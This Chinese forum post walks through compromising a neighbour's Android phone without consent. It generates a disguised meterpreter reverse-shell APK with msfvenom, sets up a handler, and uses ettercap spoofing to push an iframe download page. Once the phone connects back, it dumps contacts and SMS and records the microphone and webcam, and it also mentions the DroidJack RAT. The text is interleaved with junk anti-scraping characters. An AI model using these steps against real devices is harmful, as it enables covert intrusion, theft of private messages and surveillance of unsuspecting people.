找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2614|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% _/ K, i+ q+ |7 W, C, ~) ?$ k6 [ 五、msf+ettercap入侵邻居安卓手机 # V' X( R6 P$ Y# }6 E% p) n% Z

' R1 t `) K$ K

# S7 H% w' B+ C' e 首先启动msf , o0 @) H; k* W+ ^) O

4 e( e3 |0 X) l# ~4 S9 u

' X. S8 M6 C+ P6 I 先用kali生成一个安卓木马,如下命令: - v- B7 R$ v8 @$ q& P, |; ^2 X: R

8 P5 X+ c/ O8 {: L: R

* F7 t6 H# v- u Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) n5 y( |! r# U7 ^

+ p+ d# _1 B p8 ^3 a& Y$ H+ ]% s

( N% r3 r3 M- ?+ e 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / o5 `( I6 H) j

% L- g; n2 [3 j

1 `, E# Q! l3 k! i) U3 ? ]/ e 然后进入msf 2 P( r6 l: R* P! B0 h& l) b& q

4 ?/ \2 A& _0 D3 o' n9 J/ r& F, ^

# P; x4 c0 u3 U9 y8 ^- C7 M9 J use exploit/multi/handler ; y1 N1 Y9 g& b# T, f

$ k7 q3 p& M- x1 P

1 V+ E. C: N U# O' r( @6 F set payload android/meterpreter/reverse_tcp 3 K9 [; V3 Y7 Z! P4 e, [* A$ @

& v' y" s) y, d4 ?1 W+ B! N/ w7 F# c

% N1 [9 a* v* q" Q set LHOST 192.168.0.109 //ipkailiip ' N! o+ K! w" t+ I5 h) M& v

& P6 s/ W- x$ F9 a. H2 U: o

4 G9 e, l1 o8 s9 G set LPORT 44444 //端口一定要与前面生成的木马的端口一致 0 _' y/ A- L( K- g

2 U8 H2 r6 n# p0 q5 U& j

2 Q# ^: R T. u5 `3 M Exploit ; [6 ?6 n* A: w, x# F

" j9 U) n3 ~- e. T9 Z4 c# Q

8 l( `6 I) m+ G# k5 K c   $ J/ f! m+ k( A/ B. R

* r/ q7 F9 c* ?# {. }( R- @

, ?3 P: r. R I4 p7 E2 \' _2 B- P3 q 下面我们开启ettercap -G 0 @# t: U) @/ p3 B

5 ~4 C5 z/ i! b- N0 a

0 ^8 i3 ^0 \5 V" C 我物理IP 5 G, X' J4 S3 ~, L# k; b) W9 ^

4 G/ O! z# ^! L# @% F+ ]& O3 {3 E

/ [/ F: \& Q- r' _   . w: f; }' n" r$ O' N4 _" C' {

( m: g. `; E3 L; o4 K" |8 r

1 r$ H/ e! ~3 Q1 e' X 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 7 W) C7 v" \! d- I. M

/ K `: O3 @9 t

t0 K( J" o% {3 J 下面我们来设置一下 ' y6 w4 e) m! J5 n# l

, a& k; f4 P+ u' J5 L

, U; m* g3 ~+ o5 `) R8 P   ' [) m# C5 W$ E% g$ Z% ^; j P

& P3 H1 @; Z' c) O

0 K3 _- ^$ I ]* p8 u 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ! c$ g: k5 z4 W; z6 k* A

& {, u5 L. e. v+ F. Q

$ s9 a- E; {* n s8 K* P' t   8 j: d; b6 N: d

* I$ J# @2 M( a$ }3 H

, g- a- c9 c* V" t" z' M) I   ! J9 U4 R) E. o+ q j& v n

8 }3 x; G# f; T0 [6 `

8 P5 Y j, r5 q- D. \   ' n( T5 }& l6 d r2 ~

$ `; A; R% l$ ~0 f/ @! m

; n7 S& y; x# I0 A! h' ?! K6 Y) J4 O   & D$ s+ l+ O3 Z" |. w2 M" S

; Z, X2 |6 E$ z& x' a

. P: p6 p% E+ B4 Q   1 c5 n* _. _6 S, d, z

8 u" S" J$ \: r

# k& f% x, m) k1 W- s+ v' ?/ S   9 ]1 R, Z6 ~4 w6 h8 @3 \0 H, ~& g

% N/ _1 R8 P" C* S

+ d2 x; g7 r# L   7 L% x, B$ Z1 E6 c+ Z( P! r

+ ^0 |" E6 l4 G2 U4 g8 ?9 @1 ?

7 W+ d- X2 Y) `5 Z& L3 D   # f. L. H, i, v

, V) _4 D& { T9 m8 x

- J4 @ b; s' ~0 }/ R   4 h0 b' l( L- }& M

+ D4 q! z8 U- m( k# }/ Y

1 s! Y$ }" G3 C6 y) N/ j; c   9 ]: t* ]2 j4 I$ _6 A/ R

# Q5 `. f" t& Q9 f$ u) m. |

" l: R7 y& f( [( |, s   3 ]# `0 C5 H5 s* ?+ r

- r$ j8 [" u- M% Y! L3 b5 |

: G) A# H7 J3 o   : ?7 T" n) T9 D( g' A1 M# n

4 |! H$ m/ `9 S) d& U _$ @

& J; m3 ~ {( _5 j6 E   9 y2 G! R7 E$ q6 d4 b$ k

6 o% T7 T) u$ y) w5 s% C, k

' U2 y) d9 E$ x7 F' |) ~ 下面我们开始攻击 - T7 U6 S; n; E" ?3 O

) z. V% i/ Q) ]7 T& Y q

0 |" A5 r. F! U9 T/ s: {6 V   ' o- L, g4 }1 j9 y3 W

! b1 k, T6 i# U- G% S

/ O& t$ l$ \7 h   # ~) ^7 H: P$ u& i5 T$ h2 o6 }0 w! T

8 T: S- z: D$ c+ M$ @6 E$ E$ p

1 q5 Q; {# y1 S. M! d- T2 J9 W   : X' E3 T7 j2 x/ f d

6 D4 u4 M B+ f$ |" `

, M8 V, p% U% f( K3 P   ' N; Y% r8 V0 t0 K

' P" [. G3 H- ~3 O( U5 e* p" L2 {/ O

) t R6 b8 f- U4 w! t# b   , O7 d4 ] G0 {! A

0 @' y/ k( M. t9 a" X6 N

, t' ?" S4 A/ V. R 大概过了5分钟多,发现反弹成功了 " o# F) }8 D Y2 o* ~0 {

( M7 M7 J& O/ c' S" W

" `4 k# h6 s% d, t& w   ; X( h: b% E% o h @" W

9 p, u- u2 w5 O0 P- M- Z

. ^2 Q/ j. x% y   * ]. N7 v* J8 ^1 L, _4 j; S7 }

7 L$ ^- c: _8 [" y _3 _

( E' O( Y+ ^7 X0 y0 A6 ^7 f   % W# l7 L6 x2 g. A

% W( r+ G# G- \

% `, O* _6 ] g; M" @   % u6 ]2 [4 I+ B C. z0 `

) ^! [9 w0 d3 j9 O. z9 t

5 u# Y4 x: M1 p" L @   $ Q4 ~+ p* f" ~! {( t

( T* [" i8 q6 u N

( f4 ^! K- J3 X" U* V   % l) O$ U5 o* T9 O4 p$ }- o7 m7 G

7 N4 s0 x- I. q4 G; `! B+ ?8 e0 M5 I

$ L& W" ~ h: g+ t   : U( i3 b+ X7 _; L

3 B+ ^& g$ U2 {0 B u: j

]; M8 k a; Y9 q" h% J* V" R 执行命令 2 k Z7 k, h8 C

% C, \/ _( W/ W F

" K1 e) f1 y" E% S9 p   0 U6 o, u/ a* S( U: ~, `( O4 k; o

8 s" @& }+ b; q* k+ \) S" ~% X! M

7 }' }, W! i- @4 h" {& k: a dump_contacts    --》这个是导出电话 % {7 y. g7 V% a4 c" [

' ^) S, @ b) E5 O

& `, e' t, g0 n* j* w, S6 ^ dump_sms --》这个是导出信息 ) E$ C1 s* J- S' P, ~0 j# Z8 i" [

+ p( b& A, [( M

# e1 i# _. A5 D6 v' d$ Z O record_mic     Record audio from the default microphone for X seconds * u6 ~8 @* x+ T, r! b3 P0 O/ t

7 S# W0 Q8 X! v. t: o6 z

* G3 H: w4 _6 s! d, b/ V     webcam_chat    Start a video chat 2 t: q+ P/ [0 B5 [, w

% E6 g0 e2 }) t- B8 Z

0 [# S, q( `; ]. n( I- M- N# a! a     webcam_list    List webcams 0 p& n5 H0 L; H% m0 \

, S7 d8 p) R, [6 H3 k

* B4 U, j+ A/ ^, n     webcam_snap    Take a snapshot from the specified webcam ; |6 P- T3 k. |

# v( E/ @ T) a9 Y s

. Q& r) n+ w: u) j+ r webcam_stream  lay a video stream from the specified webcam ! S$ E. N# a r$ n4 Z' H6 j" j: [

1 C) E8 ]4 K1 b A9 X1 } t

" T) u m) T( w8 r) b# D   + ~$ V" _& L+ c$ A5 ?( T

, F+ p0 ~( C X

( O: x) K+ f) g8 S   5 H @" E+ Z4 P" F* J

2 `! [8 ^( n5 ]2 W5 \

# Y# ~" o8 X, ]* G2 p6 x 我们打开看一下电话薄, # x/ n2 I- G* M* E; c. Q

: T# I7 P' ~& `! }

5 B' X6 h+ _5 d6 i$ Q) k/ j   ; n; S* {& c2 a2 M" H

; x( @8 q! C4 J$ H

6 A, t+ w) P% Y" z; q   4 j8 K% p+ n" l( }

" n$ S7 O( {* i5 B' n( {% z

3 t4 ~2 i3 g0 h# U4 W n9 B! N1 r+ B   - c. x$ U6 I" I( ^, X

2 u* p* ~8 ?7 l$ Q

! `* F7 M8 z) Y. C   _% m( U( m! H7 C" r9 q7 ?# k

' m; B) I, `( T, s' P9 d

2 [1 |2 o+ |( |3 b E* p4 i% \+ D   % E6 Z$ V1 S1 s; ~2 l1 D/ [; ?

$ }6 G; O! D- n) I

4 q+ ~3 M) a X. t& R6 }7 A6 v   - m6 L$ t" t1 v; l6 ~; p( U

" y2 ~2 h4 w. D; M

: G5 F; o6 ~) j! { 我们同时欺骗成DroidJack木马,使用方法如图: + d9 n) W' d H9 s8 h9 r8 ]* B- H

/ h. [% p( Z9 g

6 n s) _6 [. N# [* I   8 k7 u6 O; Y0 J( s& m8 B' V6 q

/ D& }# F! w, m& U

; o+ S+ q8 y8 C- ~0 w1 \& Z( @7 u( ~   4 [/ v" h& t6 l g2 _

0 _' P6 C) ?2 t/ q" q

y; b% D+ O/ u, v1 \; P: |8 V) X   : n" l x# v$ z, c" H+ H

; j* H# i4 S/ b7 R$ K: Y; j

5 i E& @+ f# d: X( n6 f. o 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 + O2 y% _! ?- A/ F* Q4 Y

+ Y" x2 y# Z2 L* _+ S5 Q( S+ @ I

k' f: R$ [. l( l$ Z0 u   " [8 y/ S L+ o

: k( K" ~% C" r9 T% ~6 Q R- ]' r, t

" D5 e1 b/ U7 i   : g* p* T t& X. V. u; V

2 P9 ` L9 B! _% ]

& J) |% M0 D3 I$ y, v/ ]4 E" [   ! L8 S3 n( S( }# ^$ G9 r

! f1 h9 c0 @: p% w

- f% q( p# o! r; L' d9 A & [- y# A6 {; W2 ` ^) W7 T1 Y( y

4 ]. e* [! x6 e+ q. v" Z

5 f- ]% n d. ~3 e
9 i! p. r5 g ~9 K' B2 }

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表